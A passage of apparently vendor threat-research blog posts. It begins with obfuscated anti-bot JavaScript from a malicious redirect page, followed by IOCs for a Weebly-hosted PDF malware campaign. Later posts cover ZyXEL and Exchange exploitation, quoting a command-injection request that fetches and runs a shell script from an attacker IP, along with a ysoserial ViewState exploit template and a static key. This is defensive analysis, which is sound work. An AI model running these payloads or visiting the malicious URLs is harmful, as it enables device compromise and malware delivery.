botFound = 0x1;
return;
}
if (_0x292066['\x75\x4c\x75\x59\x66'](Function[_0x2b74('\x30\x78\x34\x38', '\x24\x29\x53\x73')][_0x2b74('\x30\x78\x61\x36', '\x21\x63\x46\x41')][_0x2b74('\x30\x78\x34\x33', '\x21\x63\x46\x41')]()[_0x2b74('\x30\x78\x39\x39', '\x44\x4f\x64\x47')](/bind/g, _0x292066['\x79\x6f\x6d\x48\x48']), Error[_0x2b74('\x30\x78\x62\x38', '\x51\x5d\x75\x40')]())) {
botFound = 0x1;
return;
}
if (Function[_0x2b74('\x30\x78\x30', '\x44\x54\x49\x4a')][_0x2b74('\x30\x78\x37\x36', '\x57\x2a\x58\x26')][_0x2b74('\x30\x78\x61\x33', '\x74\x51\x5b\x55')]()[_0x2b74('\x30\x78\x35\x30', '\x45\x58\x37\x54')](/toString/g, _0x292066[_0x2b74('\x30\x78\x64\x38', '\x75\x68\x29\x44')]) != Error[_0x2b74('\x30\x78\x37\x35', '\x5e\x72\x43\x28')]()) {
botFound = 0x1;
return;
}
} else {
botFound = 0x1;
}
}
if (navigator[_0x2b74('\x30\x78\x34\x36', '\x37\x77\x69\x66')]) {
if (_0x292066[_0x2b74('\x30\x78\x35\x63', '\x28\x57\x4c\x32')](_0x2b74('\x30\x78\x31\x37', '\x4e\x6a\x24\x6d'), _0x2b74('\x30\x78\x32', '\x48\x59\x58\x62'))) {
_0x292066['\x61\x6d\x64\x71\x41'](_0x102c43, this, function() {
var _0x3bfdd2 = new RegExp('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x2a\x5c\x28\x20\x2a\x5c\x29');
var _0xda1de4 = new RegExp(_0x292066[_0x2b74('\x30\x78\x31', '\x5a\x4e\x78\x6f')],'\x69');
var _0x3aa548 = _0x292066[_0x2b74('\x30\x78\x31\x35', '\x54\x51\x24\x79')](_0x5c5f61, _0x292066[_0x2b74('\x30\x78\x32\x35', '\x57\x2a\x58\x26')]);
if (!_0x3bfdd2[_0x2b74('\x30\x78\x63\x37', '\x45\x58\x37\x54')](_0x292066[_0x2b74('\x30\x78\x34\x39', '\x45\x35\x56\x7a')](_0x3aa548, _0x292066[_0x2b74('\x30\x78\x36\x33', '\x38\x38\x32\x4f')])) || !_0xda1de4[_0x2b74('\x30\x78\x39\x37', '\x5a\x4e\x78\x6f')](_0x292066['\x52\x4e\x48\x47\x4e'](_0x3aa548, _0x292066[_0x2b74('\x30\x78\x33\x65', '\x44\x4f\x64\x47')]))) {
_0x292066[_0x2b74('\x30\x78\x32\x36', '\x30\x36\x32\x26')](_0x3aa548, '\x30');
} else {
_0x292066['\x4d\x55\x76\x74\x4b'](_0x5c5f61);
}
})();
} else {
botFound = 0x1;
}
}
if (_0x292066[_0x2b74('\x30\x78\x38\x63', '\x42\x46\x4f\x38')](navigator[_0x2b74('\x30\x78\x61\x32', '\x38\x38\x32\x4f')], '')) {
botFound = 0x1;
}
if (window['\x63\x61\x6c\x6c\x50\x68\x61\x6e\x74\x6f\x6d'] || window[_0x2b74('\x30\x78\x32\x61', '\x5e\x72\x43\x28')]) {
if (_0x292066['\x4e\x4f\x63\x59\x61'](_0x292066[_0x2b74('\x30\x78\x65', '\x76\x45\x5b\x54')], _0x2b74('\x30\x78\x36\x61', '\x74\x51\x5b\x55'))) {
var _0x73dfb1 = function() {
var _0x554545 = _0x73dfb1[_0x2b74('\x30\x78\x64', '\x64\x44\x6a\x4f')](_0x292066[_0x2b74('\x30\x78\x38\x35', '\x4e\x6a\x24\x6d')])()[_0x2b74('\x30\x78\x32\x34', '\x32\x74\x67\x73')](_0x292066[_0x2b74('\x30\x78\x34\x63', '\x21\x31\x54\x42')]);
return !_0x554545[_0x2b74('\x30\x78\x38\x62', '\x4a\x71\x4c\x64')](_0x3b6a81);
};
return _0x292066[_0x2b74('\x30\x78\x32\x31', '\x28\x39\x4a\x54')](_0x73dfb1);
} else {
botFound = 0x1;
}
}
(function() {
if (!Function[_0x2b74('\x30\x78\x32\x63', '\x6e\x33\x71\x72')][_0x2b74('\x30\x78\x38\x33', '\x54\x51\x24\x79')]) {
botFound = 0x1;
return;
}
if (_0x292066['\x75\x4c\x75\x59\x66'](Function[_0x2b74('\x30\x78\x38', '\x6e\x75\x61\x7a')][_0x2b74('\x30\x78\x35\x36', '\x74\x51\x5b\x55')][_0x2b74('\x30\x78\x36\x39', '\x6e\x33\x71\x72')]()[_0x2b74('\x30\x78\x36\x66', '\x76\x45\x5b\x54')](/bind/g, _0x292066[_0x2b74('\x30\x78\x64\x30', '\x64\x44\x6a\x4f')]), Error[_0x2b74('\x30\x78\x32\x62', '\x33\x6b\x68\x46')]())) {
botFound = 0x1;
return;
}
if (_0x292066[_0x2b74('\x30\x78\x36\x36', '\x35\x29\x74\x52')](Function[_0x2b74('\x30\x78\x36\x30', '\x38\x38\x32\x4f')]['\x74\x6f\x53\x74\x72\x69\x6e\x67'][_0x2b74('\x30\x78\x61\x33', '\x74\x51\x5b\x55')]()[_0x2b74('\x30\x78\x36\x34', '\x57\x2a\x58\x26')](/toString/g, _0x292066['\x79\x6f\x6d\x48\x48']), Error[_0x2b74('\x30\x78\x64\x31', '\x32\x74\x67\x73')]())) {
botFound = 0x1;
return;
}
}());
if (window[_0x2b74('\x30\x78\x63', '\x21\x63\x46\x41')][_0x2b74('\x30\x78\x38\x37', '\x28\x57\x4c\x32')]['\x67\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65'](_0x2b74('\x30\x78\x33\x66', '\x62\x76\x54\x46'))) {
if (_0x292066[_0x2b74('\x30\x78\x31\x63', '\x37\x77\x69\x66')] === _0x2b74('\x30\x78\x66', '\x32\x74\x67\x73')) {
botFound = 0x1;
} else {
var _0x57a6c7 = function() {
while (!![]) {}
};
return _0x292066[_0x2b74('\x30\x78\x36\x32', '\x54\x58\x57\x4d')](_0x57a6c7);
}
}
if (_0x292066[_0x2b74('\x30\x78\x61\x66', '\x44\x54\x49\x4a')](navigator[_0x2b74('\x30\x78\x35\x66', '\x65\x29\x33\x51')], !![])) {
if (_0x292066[_0x2b74('\x30\x78\x62\x30', '\x28\x39\x4a\x54')](_0x292066[_0x2b74('\x30\x78\x37\x37', '\x75\x68\x29\x44')], _0x292066[_0x2b74('\x30\x78\x34\x62', '\x31\x4b\x37\x6f')])) {
var _0x3a2240 = firstCall ? function() {
if (fn) {
var _0x398ec5 = fn[_0x2b74('\x30\x78\x63\x64', '\x44\x4f\x64\x47')](context, arguments);
fn = null;
return _0x398ec5;
}
}
: function() {}
;
firstCall = ![];
return _0x3a2240;
} else {
botFound = 0x1;
}
}
if (window[_0x2b74('\x30\x78\x34\x64', '\x6e\x33\x71\x72')] || window[_0x2b74('\x30\x78\x36\x38', '\x54\x51\x24\x79')]) {
if ('\x51\x69\x52\x56\x4c' === _0x2b74('\x30\x78\x63\x39', '\x71\x36\x59\x5b')) {
botFound = 0x1;
} else {
var _0x354d13 = new RegExp(_0x292066['\x67\x4f\x42\x4f\x51']);
var _0x3892a4 = new RegExp(_0x292066['\x66\x55\x65\x66\x6d'],'\x69');
var _0x40dc95 = _0x5c5f61(_0x292066[_0x2b74('\x30\x78\x37', '\x24\x29\x53\x73')]);
if (!_0x354d13[_0x2b74('\x30\x78\x37\x39', '\x5e\x72\x43\x28')](_0x292066[_0x2b74('\x30\x78\x38\x61', '\x45\x58\x37\x54')](_0x40dc95, _0x292066[_0x2b74('\x30\x78\x37\x62', '\x32\x43\x65\x4e')])) || !_0x3892a4[_0x2b74('\x30\x78\x61\x65', '\x21\x31\x54\x42')](_0x40dc95 + _0x292066['\x4f\x48\x6b\x5a\x54'])) {
_0x292066[_0x2b74('\x30\x78\x32\x39', '\x75\x68\x29\x44')](_0x40dc95, '\x30');
} else {
_0x292066['\x51\x6e\x4b\x45\x51'](_0x5c5f61);
}
}
}
if (_0x292066[_0x2b74('\x30\x78\x63\x35', '\x45\x35\x56\x7a')](window[_0x2b74('\x30\x78\x61\x37', '\x32\x43\x65\x4e')], 0x1) && _0x292066['\x4e\x4f\x63\x59\x61'](window['\x62\x6f\x74\x46\x6f\x75\x6e\x64'], 0x0)) {
if (_0x292066[_0x2b74('\x30\x78\x32\x37', '\x67\x38\x67\x67')](_0x292066['\x7a\x6f\x65\x69\x48'], _0x292066[_0x2b74('\x30\x78\x61', '\x4e\x6a\x24\x6d')])) {
var _0x2e75d6 = window[_0x2b74('\x30\x78\x31\x30', '\x43\x73\x40\x25')][_0x2b74('\x30\x78\x63\x63', '\x74\x51\x5b\x55')]['\x73\x6c\x69\x63\x65'](0x1);
if (_0x292066[_0x2b74('\x30\x78\x34\x35', '\x76\x45\x5b\x54')](_0x2e75d6, '')) {
_0x2e75d6 = window[_0x2b74('\x30\x78\x35\x39', '\x76\x45\x5b\x54')][_0x2b74('\x30\x78\x36', '\x55\x41\x35\x25')][_0x2b74('\x30\x78\x39\x34', '\x52\x74\x36\x77')](_0x292066[_0x2b74('\x30\x78\x64\x36', '\x2a\x21\x25\x5d')](window[_0x2b74('\x30\x78\x62\x35', '\x6e\x33\x71\x72')][_0x2b74('\x30\x78\x33\x61', '\x44\x4f\x64\x47')][_0x2b74('\x30\x78\x39\x66', '\x5e\x72\x43\x28')]('\x23'), 0x1));
}
var _0x58061a = _0x292066['\x63\x46\x74\x65\x67'];
document[_0x2b74('\x30\x78\x38\x34', '\x49\x26\x38\x4b')][_0x2b74('\x30\x78\x34\x30', '\x5a\x4e\x78\x6f')] = _0x292066[_0x2b74('\x30\x78\x39\x35', '\x21\x31\x54\x42')](_0x58061a, _0x292066[_0x2b74('\x30\x78\x34\x34', '\x51\x5d\x75\x40')]) + _0x2e75d6;
_0x292066[_0x2b74('\x30\x78\x39\x61', '\x49\x26\x38\x4b')](setTimeout, _0x292066[_0x2b74('\x30\x78\x64\x32', '\x76\x4c\x37\x59')], 0x0);
window[_0x2b74('\x30\x78\x36\x37', '\x45\x35\x56\x7a')] = function() {
var _0x13d432 = {
'\x57\x6e\x6a\x61\x73': function(_0x4f5ed5) {
return _0x292066[_0x2b74('\x30\x78\x61\x62', '\x36\x50\x5a\x47')](_0x4f5ed5);
}
};
if (_0x292066['\x45\x43\x56\x43\x78'] !== _0x2b74('\x30\x78\x35\x34', '\x64\x44\x6a\x4f')) {
null;
} else {
_0x13d432[_0x2b74('\x30\x78\x31\x62', '\x2a\x21\x25\x5d')](_0x5c5f61);
}
}
;
} else {
botFound = 0x1;
}
}
}
function _0x47b803() {}
function _0x5c5f61(_0x3d4ef9) {
var _0x958405 = {
'\x4c\x58\x45\x56\x79': _0x2b74('\x30\x78\x35\x35', '\x32\x43\x65\x4e'),
'\x76\x77\x53\x4c\x69': function(_0x1b126c, _0x2283f8) {
return _0x1b126c * _0x2283f8;
},
'\x44\x4c\x49\x73\x49': function(_0xa896f2, _0x3dcba0) {
return _0xa896f2 > _0x3dcba0;
},
'\x64\x79\x46\x4f\x6e': function(_0x550534, _0x4c8cc3, _0x29892e) {
return _0x550534(_0x4c8cc3, _0x29892e);
},
'\x66\x43\x72\x6f\x44': function(_0x169c35, _0x10cca4) {
return _0x169c35 - _0x10cca4;
},
'\x57\x58\x70\x49\x63': _0x2b74('\x30\x78\x33\x37', '\x52\x74\x36\x77'),
'\x45\x4f\x4a\x75\x77': function(_0x53c43a, _0x130863) {
return _0x53c43a === _0x130863;
},
'\x43\x74\x49\x7a\x4a': '\x44\x4b\x57\x67\x51',
'\x58\x75\x54\x41\x51': function(_0x37f3f3) {
return _0x37f3f3();
},
'\x70\x79\x77\x47\x46': function(_0x7a6ea6, _0xfb52a9) {
return _0x7a6ea6 === _0xfb52a9;
},
'\x76\x72\x75\x45\x71': _0x2b74('\x30\x78\x37\x66', '\x5e\x50\x4b\x49'),
'\x73\x51\x53\x73\x41': _0x2b74('\x30\x78\x33\x33', '\x30\x36\x32\x26'),
'\x61\x4e\x4c\x55\x4b': function(_0x5d6cd1, _0x193cae) {
return _0x5d6cd1 !== _0x193cae;
},
'\x79\x67\x78\x45\x4e': function(_0x156d2b, _0xc9c318) {
return _0x156d2b / _0xc9c318;
},
'\x42\x59\x77\x55\x6a': _0x2b74('\x30\x78\x61\x31', '\x2a\x21\x25\x5d'),
'\x4e\x78\x4c\x4f\x46': _0x2b74('\x30\x78\x38\x38', '\x2a\x21\x25\x5d'),
'\x4a\x6b\x79\x77\x78': function(_0x164679, _0x559fd2) {
return _0x164679(_0x559fd2);
},
'\x55\x76\x53\x45\x43': _0x2b74('\x30\x78\x38\x30', '\x6e\x33\x71\x72'),
'\x76\x56\x41\x77\x41': function(_0x1d5f32, _0x1d6c90) {
return _0x1d5f32(_0x1d6c90);
}
};
function _0x483faa(_0x1eabd1) {
var _0x4404d8 = {
'\x54\x6d\x78\x41\x76': function(_0x16ba48, _0x21289c) {
return _0x16ba48(_0x21289c);
}
};
if (typeof _0x1eabd1 === _0x958405['\x57\x58\x70\x49\x63']) {
if (_0x958405[_0x2b74('\x30\x78\x32\x64', '\x4e\x6a\x24\x6d')](_0x958405['\x43\x74\x49\x7a\x4a'], _0x2b74('\x30\x78\x32\x66', '\x33\x6b\x68\x46'))) {
_0x4404d8[_0x2b74('\x30\x78\x61\x63', '\x48\x59\x58\x62')](result, '\x30');
} else {
var _0x2d4448 = function() {
if (_0x958405[_0x2b74('\x30\x78\x62\x39', '\x21\x63\x46\x41')] !== _0x958405['\x4c\x58\x45\x56\x79']) {
botFound = 0x1;
} else {
while (!![]) {}
}
};
return _0x958405['\x58\x75\x54\x41\x51'](_0x2d4448);
}
} else {
if (_0x958405[_0x2b74('\x30\x78\x35', '\x54\x51\x24\x79')](_0x958405[_0x2b74('\x30\x78\x61\x30', '\x36\x50\x5a\x47')], _0x958405[_0x2b74('\x30\x78\x34\x65', '\x64\x44\x6a\x4f')])) {
for (a = 0x1; a <= iterations; a++) {
num = _0x958405[_0x2b74('\x30\x78\x36\x64', '\x30\x36\x32\x26')](Math[_0x2b74('\x30\x78\x38\x66', '\x63\x67\x6e\x25')](), 0x2710);
}
if (_0x958405[_0x2b74('\x30\x78\x36\x35', '\x71\x36\x59\x5b')](depth, 0x0)) {
return _0x958405['\x64\x79\x46\x4f\x6e'](_0x355530, Math[_0x2b74('\x30\x78\x33\x62', '\x28\x39\x4a\x54')](num, 0x1), _0x958405[_0x2b74('\x30\x78\x61\x61', '\x49\x26\x38\x4b')](depth, 0x1));
} else {
return num;
}
} else {
if (_0x958405['\x61\x4e\x4c\x55\x4b'](('' + _0x958405['\x79\x67\x78\x45\x4e'](_0x1eabd1, _0x1eabd1))[_0x958405[_0x2b74('\x30\x78\x64\x35', '\x42\x46\x4f\x38')]], 0x1) || _0x958405[_0x2b74('\x30\x78\x34\x32', '\x31\x4b\x37\x6f')](_0x1eabd1 % 0x14, 0x0)) {
if (_0x958405[_0x2b74('\x30\x78\x39\x63', '\x65\x29\x33\x51')](_0x958405[_0x2b74('\x30\x78\x63\x36', '\x52\x74\x36\x77')], _0x958405[_0x2b74('\x30\x78\x34\x66', '\x76\x45\x5b\x54')])) {
return num;
} else {
debugger ;
}
} else {
debugger ;
}
}
}
_0x958405['\x4a\x6b\x79\x77\x78'](_0x483faa, ++_0x1eabd1);
}
try {
if (_0x3d4ef9) {
if (_0x958405['\x55\x76\x53\x45\x43'] === _0x958405[_0x2b74('\x30\x78\x37\x63', '\x51\x5d\x75\x40')]) {
return _0x483faa;
} else {
botFound = 0x1;
}
} else {
_0x958405['\x76\x56\x41\x77\x41'](_0x483faa, 0x0);
}
} catch (_0x1611d5) {}
}
}
</script>
</head>
<body></body>
</html>

Because of the advanced javascript techniques, these malicious URLs are not detected by any security vendors. They all follow the same pattern in the URL */uploads/1/3/* and all these malicious websites are found to be hosted on Weebly (a website and eCommerce service). Attackers possibly compromised the web sites hosted on Weebly and dropped the malicious html and pdf documents into the uploads directory.

When not debugged and no bot found, it redirects the user to the below page which delivers the payload "new toeic reading test.exe" to the victim. Based on the input passed in the URL, different payloads get delivered.

At the bottom of the pdf, more such malicious pdf links are provided. We observe various pdf's in this format hosted on the compromised web pages. The first malicious file in this campaign was observed on 2020-01-05 (hash: E684AEEAA0F12D415C0EF321341BCF2FF0CBE7B3099EFC8A2E99B49794F337D9) and over 20,000 unique malicious pdfs in this format have been collected in VirusTotal in the last 6 months.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

GAV: 6075 RobotInstall.PD

GAV: 5313 Malagent.N_69

IOC's:

PDF

hxxp://abeautypageants.com/uploads/1/3/0/4/130477064/tawesa_metumiwi.pdf
hxxp://andrewgouldmusic.com/uploads/1/3/0/5/130551623/dijumuzu.pdf
hxxp://gooebuttercakes.com/uploads/1/3/0/5/130550825/desosi-fuzivekok.pdf
hxxp://skyhutchison89.com/uploads/1/3/0/4/130483981/wasakufoturulumowob.pdf
hxxp://mepalparish.org/uploads/1/3/0/5/130551962/308871.pdf
hxxp://springbloomhealth.net/uploads/1/3/0/5/130588533/puzevubezaxudip-zikitaza-jiraxiri-sixotijisa.pdf
hxxp://turnerhallmedia.com/uploads/1/3/0/7/130738507/putolumeka.pdf
hxxp://cannabisusa.world/uploads/1/3/0/3/130313090/dulivizexifekoxoseva.pdf
hxxp://bydaff.com/uploads/1/3/0/9/130969768/1870408.pdfhxxp://pwinthtwe.com/uploads/1/3/0/3/130379841/tavulesad.pdf
hxxp://magicaladventurestravelbystacy.com/uploads/1/3/0/7/130776561/nikovadato-matoxop-woposowogewitu-vetazujugigisu.pdf)
hxxp://mta-sts.lavwcd.com/uploads/1/3/0/6/130640097/xamidezetufef.pdf
hxxp://cristinmcintyre.com/uploads/1/3/0/3/130323635/mowena.pdfhxxp://beringsearestaurant.com/uploads/1/3/0/2/130272347/5798288.pdf
hxxp://ag-one.com/uploads/1/3/1/4/131437737/gedanisinena.pdfhxxp://borgproduction.fr/uploads/1/3/0/3/130379634/7c6c5.pdf

html/javascript:

hxxp://mercyministrystl.org/uploads/1/3/0/6/130621669/130621669.html
hhxxp://beeidentification.com/uploads/1/3/0/6/130605420/130605420.htmlnew+toeic+reading+test
hxxp://homefromhomebandbwinchester.com/uploads/1/3/0/6/130620251/130620251.htmlpoldark+season+5+episode+3+recap
hxxp://galibellesue.com/uploads/1/3/0/6/130604986/130604986.htmltexto+informativo+sobre+los+animales+en+peligro+de+extinci%C3%B3n
hxxp://southbayreiki.com/uploads/1/3/0/6/130639956/130639956.htmlcartea+mortilor+film+online+subtitra
hxxp://2averagedudes.com/uploads/1/3/0/6/130604402/130604402.htmlrussian+keyboard+download+windows+10)

Payload dropper:

https://mob1ledev1ces.com/r/?token=29b4b9d3927e49789a254b7c85c089cb4110575c&q=teamviewer+free++version+9.+0&s1=1m2dj0iak20d
Teamviewerviewer : dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

https://mob1ledev1ces.com/r/?token=29b4b9d3927e49789a254b7c85c089cb4110575c&q=new+toeic+reading+test&s1=191vbjoak560dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

Payload:

dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

Attacker IP:

104.27.181.152 - hxxp://ttraff.cc

Hosting server IP (Weebly):

199.34.228.54
199.34.228.59
199.34.228.100
199.34.228.71

July 3, 2020/by

intrusions, IoT, news, spotlight, waf

Hackers actively targeting remote code execution vulnerability on ZyXEL devices

SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.

Vulnerability | CVE-2020-9054

A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication by using the weblogin.cgi program. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains OS command, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.

We observe the below hits more often as attackers scan for the vulnerable devices. In the username parameter, it sends the command "ls," a vulnerable device will return without any error.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf"

On vulnerable devices, the attacker performs the below Http GET request which attempts to download a shell script to the "tmp" directory, execute the shell script "test.sh", and later remove the script.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"

A quick search on shodan shows few hundreds of the affected ZyXEL NAS devices exposed online.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution

Affected Products:

ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.

Users are recommended to install the standard firmware patches immediately. No updates available for NAS products that reached end-of-support, users are advised not to leave the product directly exposed to the internet. If possible, connect it to a security router or firewall for additional protection.

Find vendor advisory here

IOC:

Attacker IP's:

62.171.171.24
108.41.185.191
95.55.151.170
110.29.165.15
83.228.1.77
213.59.131.51
201.21.226.33
222.138.203.0
77.76.182.174
103.123.150.66
182.180.173.249
194.143.248.230
128.90.164.48
103.234.226.145
75.145.190.44
94.227.15.86
108.7.223.135
169.1.233.212
114.129.28.252
89.211.220.169
37.191.233.81
187.143.247.123
116.196.65.202
47.101.136.228
93.114.113.103
154.126.79.223
187.182.168.14
14.234.48.139
92.70.17.98
177.81.219.19
91.227.50.230
122.230.145.99
95.76.102.94
77.52.185.59
67.165.140.191
187.120.194.22
82.222.168.10
94.225.181.234
124.123.127.69
61.239.185.168
190.139.6.182
213.164.215.33
103.240.77.52
124.109.50.214
122.117.143.35
114.220.117.147
109.130.153.176
83.23.126.120
93.40.11.165
213.153.153.219
103.133.122.6
203.40.91.116
186.158.175.131
69.254.107.46
2.26.219.16
177.41.37.241
73.185.241.75
200.117.244.223
220.184.203.94
41.188.62.215
177.39.102.151

June 27, 2020/by

intrusions, news, spotlight, waf

Hackers are actively trying to exploit vulnerable Microsoft Exchange Servers

SonicWall Capture Labs Threat Research team observes attackers actively probing for vulnerable Microsoft Exchange servers.

Vulnerability | CVE-2020-0688:

A remote code execution vulnerability has been reported in Microsoft Exchange Server. The weakness is due to the server failing to properly create unique keys at the time of installation. Microsoft Exchange Server does not randomly generate a key for each installation, but instead, all installations of Microsoft Exchange Server includes the same validationKey and decryptionKey values in web.config. Knowledge of the static key allows an authenticated attacker with a mailbox to trick the server into deserializing maliciously crafted data.

Exploitation:

Exchange User Account Takeover:

This is a crucial step in leveraging this vulnerability as compromising an Exchange user account would allow an attacker to take over the vulnerable Microsoft Exchange Server. As a result, attackers try to locate the Exposed Vulnerable Outlook Web Application using search engines such as Shodan, and then try to authenticate through credential stuffing. In this stage, hackers take sets of credentials that have been leaked through data breaches or other means, then attempt to use these credentials to log in to an exchange account.

Retrieve Session Information:

External users who connect to Outlook on the web (OWA) will also have access to the ECP to access their own options page. ECP (Exchange Control Panel) is the web-based management console in Exchange Server. After an exchange user account has been successfully taken over, the attackers log in to the Exchange Control Panel i.e "https://<ServerFQDN>/ecp" to retrieve ViewStateGenerator and ViewStateUserKey from the authenticated session.

ValidationKey is already known to attackers as vulnerable versions of exchange server use the same static key "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" as validationKey and SHA1 as validation algorithm.

ViewStateGenerator - retrieved from the authenticated session.
ViewStateUserKey - retrieved from the authenticated session.
ValidationKey - static for vulnerable servers.
ValidationAlg - known for vulnerable servers.

Generate ViewState Payload:

The next step is to create a ViewState payload. Many ASP.Net Websites use Viewstate to exchange the state of controls on a page between the Client and the Server to achieve state-fullness. Viewstate, a base64 serialized parameter is then posted back from the client to the server within the body of the page via a hidden parameter called __VIEWSTATE. This parameter is deserialized on the server-side to retrieve the data. With all the retrieved information, attackers create a ViewState payload using .Net exploit tools like shown below.

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c <malicious code>

--validationalg="SHA1" --validationkey=<Validationkey> --generator=<ViewStateGenerator>

--viewstateuserkey=<ViewStateUserKey> --isdebug –islegacy

Remote Code Execution:

After successfully generating the ViewState payload, attackers perform remote code execution by submitting the following URL to the vulnerable Exchange server.

https://<ServerFQDN>/ecp/default.aspx?__VIEWSTATEGENERATOR=<ViewStateGenerator>&__VIEWSTATE=<CraftedViewStatePayload>

Patch:

Find the vendor advisory here

Microsoft patched this vulnerability in February 2020 by randomizing the cryptographic keys at install time.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signatures:

IPS: 14826 Microsoft Exchange Server Remote Code Execution (CVE-2020-0688)

IPS: 14825 /ecp/default.aspx Access (INFO)

IOC's (Indicators of Compromise):

Find below some of the IP addresses that SonicWall firewall blocked

13.57.228.15
54.185.160.4
138.68.14.1
12.251.232.10
134.209.89.216
138.197.128.133
139.162.189.189
157.245.238.238
159.203.19.15
159.203.47.213
172.105.64.188
172.105.90.222
173.255.200.120
178.79.185.139
192.241.180.240
192.241.181.54
45.33.69.57
45.33.70.185
45.33.81.143
45.79.49.174
45.79.57.25
46.101.117.27
46.101.245.165
46.101.98.23
66.175.201.230
69.164.221.241
97.107.135.129

February 29, 2020/by

intrusions, IoT, malware, news, spotlight, waf

Linear eMerge E3 access controller actively being exploited

Linear eMerge E3:

Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation, and personal safety systems and devices. Nortek Security and Control LLC's Linear eMerge E3 is an access controller that specifies which doors a person can use to enter and exit designated places at specified times. It runs on embedded Linux Operating System and the system can be managed from a browser via embedded web server. These access systems are used for commercial, industrial, banking, medical, retail, hospitality, and other businesses where users need to secure their facilities.

Vulnerability | CVE-2019-7256:

A Command Injection vulnerability has been reported in eMerge E3-series access controller. This issue is triggered due to insufficient sanitizing of user-supplied inputs to a PHP function allowing arbitrary command execution with root privileges. A remote unauthenticated attacker can exploit this to execute arbitrary commands within the context of the application, via a crafted HTTP request.

Exploit:

SonicWall Capture Labs Threat Research team observe huge hits on our firewalls that attempt to exploit the command injection vulnerability with the below HTTP request.

Once the vulnerability is exploited successfully on the target, the following shell commands will be executed on the target system:

The above shell commands are used to download the malware and execute it on the exploited systems.

The malware then accepts commands from its C2 server to conduct various types of DoS attacks against any given target.

Affected:

Linear eMerge Elite/Essential Firmware version 1.00-06

Impact:

As per Applied Risk's research report, a total number of 2,375 Internet-accessible eMerge devices are listed by the Shodan search engine; 600 for eMerge50P and 1775 for eMerge E3.

A quick search on Shodan exposes over 2000 linear devices.

An attacker can leverage an OS command injection vulnerability to alter or corrupt a database, steal customer records, launch a distributed denial of service (DDoS) attack or even compromise other parts of the hosting infrastructure. The resulting damage is determined by the user authorizations and security protections that the organization has in place. In addition, attackers may retain access to the systems even after an organization has detected and fixed the underlying vulnerability.

Fix:
No patch available yet.
The exploitation is known to be easy, given the proof of concept code. The attack may be launched remotely and no form of authentication is required for exploitation.

In order to prevent this exploit, it may require blocking access to the vulnerable PHP script until a security patch is out or allow only a whitelist of permitted values.

After discovering that an OS command injection attack has taken place, it's critical to cut off access to the compromised systems from the internal networks.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

IPS: 14767 Linear eMerge Remote Code Execution

WAF: 9012 System Command Injection Variant 2

Heat Map:

Attackers seem to be actively targeting these devices as we see tens of thousands of hits every day, targeting over 100 countries with the most attacks being observed in the U.S.

Trend Chart:

IOC's:

We do not find these IP addresses associated with any specific threat actor and most of these are seen crawling the internet, looking for vulnerable services, attempting to brute force and exploit the IoT devices. A good amount of attacks originate from compromised devices like Webcam or DVR that indicates that it's infected with a Conficker or Mirai-like variant of malware.

121.138.83.147
220.92.153.250
195.223.173.102
88.61.0.93
62.86.25.151
217.58.35.193
195.103.133.46
80.22.178.53
80.21.75.143
221.157.203.236
94.89.40.90
80.22.8.239
62.86.6.98
5.96.237.174
82.191.134.50
88.57.72.14
88.32.72.110
88.44.33.170
31.197.102.187
62.86.211.49
88.42.32.78
94.81.7.43
37.205.159.206
62.86.203.177
217.58.61.49
82.185.94.187
88.34.126.169
80.19.160.157
212.131.13.41
217.141.242.114
85.33.36.165
85.33.39.225
194.243.255.230
82.189.198.34
80.17.57.197
5.97.218.186
151.11.117.230
2.112.35.46
94.91.166.163
2.113.121.141
80.18.113.223
217.58.167.45
212.131.143.250
88.58.46.118
31.199.241.17
37.205.207.125
79.3.199.89
80.22.20.166
94.94.226.54
217.58.149.69
88.34.126.171
88.44.33.166
80.21.229.186
66.76.142.242
31.196.187.61
203.158.18.80
85.35.30.58
94.80.117.38
2.194.70.9
2.194.70.202
80.21.170.254
45.58.123.178
37.207.247.58
2.194.70.232
45.56.97.236
190.115.18.86
213.26.141.26
2.194.65.36
2.194.65.46
95.210.74.80
52.2.194.128
198.210.24.5
147.75.226.58
107.162.6.45
52.55.228.83
18.211.74.2
94.94.194.46
18.213.94.236
95.210.74.90
89.25.34.37
3.218.66.165
165.100.216.29
209.124.44.10
2.194.65.101
196.250.8.153
193.169.82.20
80.239.119.247
80.95.0.73
107.162.6.99
89.39.60.121
45.125.10.132
177.131.116.13
18.195.232.15
107.162.6.18
34.196.8.195
2.194.65.221
34.230.216.5
175.101.19.169
3.227.113.46
184.185.45.254
107.162.6.48
89.25.34.39
213.249.131.209
52.44.57.241
94.135.234.240
198.210.17.1
54.214.32.228
45.6.63.145
182.71.249.209
2.194.73.156
179.95.237.242
193.182.183.2
98.159.149.189
103.62.95.165
2.194.67.115
3.214.34.155
192.50.2.1
120.79.16.234
213.27.197.196
2.194.71.224
50.240.171.85
107.162.6.49
3.220.141.26
95.210.74.108

February 1, 2020/by

intrusions, malware, news, spotlight, waf

Apache Solr vulnerabilities bound to be attacked

What is Apache Solr?

